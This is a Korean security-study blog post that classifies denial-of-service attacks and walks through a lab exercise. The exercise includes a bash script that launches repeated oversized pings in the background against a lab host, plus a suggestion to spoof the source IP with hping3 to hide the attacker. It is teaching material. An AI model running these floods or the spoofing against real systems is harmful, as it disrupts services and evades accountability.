본문으로 바로가기

DoS(Denial of Service) Attack Type

category Security/Network Security 2017. 10. 21. 21:06

- LAND Attack -> DoS attack ( 1 : 1 )

- Smurf Attack -> DDoS attack ( N : 1 )


- DoS Attack Type

1. Flood Attack

- TCP SYN Flood

공격자 IP를 spoofing 하고 half-open TCP 연결을 시도하여 상대 호스트의 Listening Queue를 고갈 시키는 공격

- UDP Flood Attack

UDP Body에 Garbage Data를 Padding 하여 공격

- ICMP Smurfing Attack

ICMP 프로토콜과 IP Broadcast 주소를 이용하여 공격

- ICMP Flood Attack


2. Software Attack

Ping of Death

ping 명령어를 이용하여 ICMP 패킷을 비 정상적으로 크게 만들어 공격하는 방법

파일을 크게 만들면 통신하기 위해 작은 단위로 쪼갠다. > 상대가 조립할게 많아 과부화

> 현재 OS 들은 ICMP 패킷을 크게 만들어도 감당 가능

TearDrop

패킷을 겹치거나 또는 일정한 간격이 빠지게 전송하는 방법 ( offset이 같은 패킷 전송 )


- ICMP LAND 툴 제작하기 

( kali )

 사용 명령어  : ping -s 60000 <Target IP >

-> ping 명령어로 파일의 크기를 늘려 부하량을 증가 시킨다. 


부하량 확인

( linux200 )

# gnome-system-monitor &


( kali )

# gnome-system-monitor &

 > 자원

# ping -s 60000 192.168.27.200


( linux200 ) 

> 부하가 많이 안걸리지만 걸리긴 걸린다. 

> 부하량은 상관이없다 작으면 여러번 실행해서 부하량이 쌓이게 하면 된다. 


( kali )

> 보내는 쪽도 부하가 조금 걸리는 듯 하다. 


( kali )

# mkdir -p /root/bin

# cd /root/bin

# vi ping.sh

 

 #!/bin/bash


if [ $# -ne 1 ] ; then

        echo "Usage : $0 < Target IP > "

        exit 1

fi


T_IP=$1

SIZE=60000

MAX=3


for i in `seq 1 $MAX`

do

        ping -s $SIZE $T_IP > /dev/null 2>&1 &

        sleep 3

done


sleep 86400           

 

> 부하량이 적기때문에 ping 명령어를 백그라운드로 여러번 실행한다. 

> sleep 86400 : 프로그램이 하루동안 실행된다. -> CTRL + C 키를 누르면 ping 도 끝난다. 

> sleep 이 없다면 ping이 백 그라운드로 계속 실행되고 PID를 알아내 모두 삭제하거나 pkill 명령어를 이용해 ping 을 종료시켜야한다.


하지만 이러한 ping 공격은 자신의 IP도 노출되며 자신에게도 부하량이 걸린다. 

자신에게 부하량도 안걸리면서 자신의 IP도 노출되지 않게 하려면?

 -> hping3 툴로 공격자 IP를 바꾼다. 

> 타겟은 SYN ACK을 spoofing한 존재하지 않는 IP로 보내기 때문에 공격하는 실제 서버는 받지 않는다.

> 공격 서버는 SYN 패킷만 보내고 받는 패킷은 없기때문에 부하량이 줄어든다. 

'Security > Network Security' 카테고리의 다른 글

TCP Syn Flooding Attack 보안 방법  (0) 2017.10.21
TCP Syn Flooding Attack  (0) 2017.10.21
hping3 명령어 사용하기  (0) 2017.10.21
TCP/UDP 대표적인 서비스 패킷 분석  (0) 2017.10.19
Port 번호 체계  (0) 2017.10.19